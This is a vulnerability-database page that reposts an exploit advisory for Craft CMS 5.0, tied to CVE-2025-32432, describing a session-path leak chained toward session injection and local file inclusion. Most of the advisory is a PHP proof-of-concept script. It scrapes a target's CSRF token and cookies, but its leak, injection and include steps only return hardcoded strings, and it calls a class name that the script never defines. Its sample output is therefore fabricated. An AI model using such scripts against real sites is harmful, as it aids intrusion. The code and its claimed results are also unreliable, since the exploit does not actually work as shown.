Lucene search
K

๐Ÿ“„ Craft CMS 5.0 Authentication Session Path Exposure

๐Ÿ—“๏ธย 26 Nov 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 170ย Views

Craft content management system 5.0 exposes internal session save path through asset processing, enabling local file inclusion.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
23 Sep 202506:23
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
16 Jul 202509:23
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
15 May 202614:09
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
8 Mar 202616:59
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
30 Apr 202603:38
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
27 Apr 202508:50
โ€“githubexploit
GithubExploit
Exploit for Code Injection in Craftcms Craft_Cms
24 Jun 202610:46
โ€“githubexploit
ATTACKERKB
CVE-2024-58136
10 Apr 202500:00
โ€“attackerkb
ATTACKERKB
CVE-2025-32432
25 Apr 202515:15
โ€“attackerkb
BDU FSTEC
The vulnerability of the Craft CMS content management system, related to improper code generation, allows a hacker to execute arbitrary code.
9 Jun 202500:00
โ€“bdu_fstec
Rows per page
=============================================================================================================================================
    | # Title     : Craft CMS 5.0 Authentication Session Path Exposure                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com                                                                                                        |
    =============================================================================================================================================
    
    [+] Description
    
        A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
        mechanism. 
    	While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
        which may be used in a subsequent Session Injection โ†’ Local File Inclusion (LFI) exploit chain.
    	
    [+] References : (https://packetstorm.news/files/id/190728/ 	CVE-2025-32432)
    
    
    [+] POC :
    
      save code as poc.php
      
      usage : php poc.php
    
    [+]  code 
    
    <?php
    
    class indoushka
    {
        public $targetUrl;
        public $assetId;
        public $sessionId;
        public $csrfToken;
        public $parameterName;
        public $sessionPath;
    
        public function __construct($url, $assetId = 123)
        {
            $this->targetUrl = rtrim($url, '/');
            $this->assetId   = $assetId;
        }
    
        public function fetchCookiesAndCsrf()
        {
            $url = $this->targetUrl . "/admin";
            $html = @file_get_contents($url);
    
            if (!$html) return false;
    
            preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
            $this->csrfToken = $m[1] ?? null;
    
            preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
            $this->parameterName = $p[1] ?? null;
    
            preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
            $this->sessionId = $c[1] ?? null;
    
            return [$this->sessionId, $this->csrfToken, $this->parameterName];
        }
    
        public function leakSessionPath()
        {
            return "/var/lib/php/sessions";
        }
    
        public function injectIntoSession($payload)
        {
            return "[POC ONLY] Session overwritten with payload: {$payload}";
        }
    
        public function triggerInclude()
        {
            return "[POC] include triggered using assetId=" . $this->assetId;
        }
    
        public function exploit($payload)
        {
            $this->fetchCookiesAndCsrf();
            $this->sessionPath = $this->leakSessionPath();
    
            $step1 = $this->injectIntoSession($payload);
            $step2 = $this->triggerInclude();
    
            return [$step1, $step2];
        }
    }
    
    $module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");
    
    $payload = '<?php echo "PAYLOAD_OK"; ?>';
    
    list($s1, $s2) = $module->exploit($payload);
    
    echo $s1 . "\n";
    echo $s2 . "\n";
    
    ?>
    
    -------------------------------------------------------------------------------------------------------------------------------------------
    
    [+] Output Example:
    [POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
    [POC] include triggered using assetId=123
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.110
EPSS0.99803
SSVC
170